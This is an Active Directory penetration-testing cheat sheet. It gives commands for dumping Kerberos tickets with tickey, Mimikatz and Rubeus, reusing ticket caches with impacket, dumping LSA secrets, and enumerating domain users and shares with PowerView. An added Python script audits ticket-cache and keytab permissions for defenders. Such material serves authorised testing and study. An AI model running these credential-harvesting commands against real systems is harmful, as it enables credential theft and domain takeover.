Active Directory
This section assumes you already have access to a computer that is joined to the AD domain, i.e. an assumed-breach scenario starting from that computer.
Enumerate Juicy Info
Harvest tickets from Linux
Check type and location of tickets:
grep default_ccache_name /etc/krb5.conf
If nothing is returned, the default is FILE:/tmp/krb5cc_%{uid}.
In the case of FILE tickets, you can copy the cache file (if you have permissions on it) and use it directly.
In the case of KEYRING tickets, you can use tickey to extract them:
# Dumps the current user's tickets; when run as root, it tries to dump all users' tickets by injecting into their processes
# For the injection to work, copy tickey into a folder that is reachable by all users
cp tickey /tmp/tickey
/tmp/tickey -i
Harvest tickets from Windows
With Mimikatz:
mimikatz # sekurlsa::tickets /export
With Rubeus in PowerShell:
.\Rubeus.exe dump
# Rubeus prints the tickets as base64; to write one of them to a .kirbi file:
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64_ticket>"))
reference:
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
krb5.keytab
Extract the keys from a keytab with KeyTabExtract -> https://github.com/sosdave/KeyTabExtract/blob/master/keytabextract.py
# Linux: cached Kerberos tickets and keytabs
find / -type f -iname "krb5.keytab" 2>/dev/null
find / -type f -iname "krb5cc_*" 2>/dev/null
# Windows: cached Kerberos tickets and keytabs
dir "\krb5*.keytab" /s
dir "\krb5cc_*" /s
If you find a krb5cc_* file, point the KRB5CCNAME environment variable at it and check it with klist
(the cache is named per user, so use the actual file name rather than a glob):
export KRB5CCNAME=/tmp/krb5cc_<uid>
klist
# If klist lists the ticket, you can authenticate with it and no password is needed, e.g. with impacket:
python3 GetADUsers.py -all -k -no-pass -dc-ip 172.16.x.y <domain>/<username>
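The two Linux checks above (the default_ccache_name setting and the find commands for krb5cc_* and keytab files) are also what a defender should run to see how exposed a host's Kerberos material is. The script below is an added example and is not part of the original page or of any tool it links to: it parses the krb5.conf setting, resolves the MIT default when the key is absent, walks the given directories for caches and keytabs, and reports any file whose mode bits make it readable by its group or by everyone. The demo in the block builds its own constructed files in a temporary directory, so it runs offline; point audit_host at /etc/krb5.conf and real directories to audit an actual host.

```python
# Added example (not from the original page): audit Kerberos credential-cache
# and keytab exposure on a Linux host from a defender's point of view.
import os
import re
import stat
import tempfile

# MIT Kerberos default when default_ccache_name is not set in krb5.conf.
DEFAULT_CCACHE = "FILE:/tmp/krb5cc_%{uid}"


def parse_default_ccache_name(krb5_conf_text):
    """Return default_ccache_name from krb5.conf text, or the MIT default."""
    for raw in krb5_conf_text.splitlines():
        # krb5.conf comments start with '#' or ';'
        line = re.split(r"[#;]", raw, maxsplit=1)[0].strip()
        m = re.match(r"default_ccache_name\s*=\s*(\S+)", line)
        if m:
            return m.group(1)
    return DEFAULT_CCACHE


def ccache_type(name):
    """Split 'TYPE:residual' into (TYPE, residual); a bare path means FILE."""
    if ":" in name:
        ctype, residual = name.split(":", 1)
        return ctype.upper(), residual
    return "FILE", name


def expand_uid(residual, uid):
    """Substitute the %{uid} / %{euid} parameter expansions used in krb5.conf."""
    return residual.replace("%{uid}", str(uid)).replace("%{euid}", str(uid))


def audit_file(path):
    """Return permission findings for one cache or keytab file (empty = ok)."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    findings = []
    if mode & stat.S_IRGRP:
        findings.append("group-readable")
    if mode & stat.S_IROTH:
        findings.append("world-readable")
    return findings


def find_candidates(search_dirs):
    """Locate krb5cc_* caches and *.keytab files under the given directories
    (the same two things the page's find commands look for)."""
    hits = []
    for base in search_dirs:
        for root, _dirs, files in os.walk(base):
            for fn in files:
                if fn.startswith("krb5cc_") or fn.endswith(".keytab"):
                    hits.append(os.path.join(root, fn))
    return sorted(hits)


def audit_host(krb5_conf_text, uid, search_dirs):
    """Report the configured cache type, the expected FILE cache path for uid,
    and every candidate file with its findings."""
    ctype, residual = ccache_type(parse_default_ccache_name(krb5_conf_text))
    report = {
        "ccache_type": ctype,
        "expected_cache": expand_uid(residual, uid) if ctype == "FILE" else None,
        "files": {},
    }
    for path in find_candidates(search_dirs):
        report["files"][path] = audit_file(path)
    return report


def demo():
    """Constructed scenario: a temp dir standing in for /tmp with one loose
    cache (0644) and one properly restricted keytab (0600). Returns findings
    keyed by file name."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, mode in (("krb5cc_1000", 0o644), ("krb5.keytab", 0o600)):
            p = os.path.join(tmp, name)
            open(p, "wb").close()
            os.chmod(p, mode)
        conf = "[libdefaults]\n default_realm = EXAMPLE.LOCAL\n"  # no ccache key set
        rep = audit_host(conf, 1000, [tmp])
        return {os.path.basename(p): f for p, f in rep["files"].items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings or "ok")
```

A cache that is readable by other users is the condition that makes the copy-and-use step above trivial, so a non-empty findings list for a krb5cc_* file is the thing to fix (0600 and owned by the user); a keytab with anything beyond owner-read deserves the same treatment.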
PowerView
Import module
powershell -ep bypass
[PS] . .\PowerView.ps1
The Domain Users
Get-NetUser | select cn
# dump the interesting info
Get-NetUser | select cn,lastlogon,logoncount,memberof
The Domain Groups
Get-NetGroup -GroupName *admin*
The Shared Folder
Invoke-ShareFinder
Note: the default administrative shares are:
ADMIN$
C$
IPC$
NETLOGON
SYSVOL

Net Computer
Get-NetComputer -FullData
Get-NetComputer -FullData |select operatingsystem
Mimikatz
Note: must be run as administrator
mimikatz.exe
privilege::debug
lsadump::lsa /patch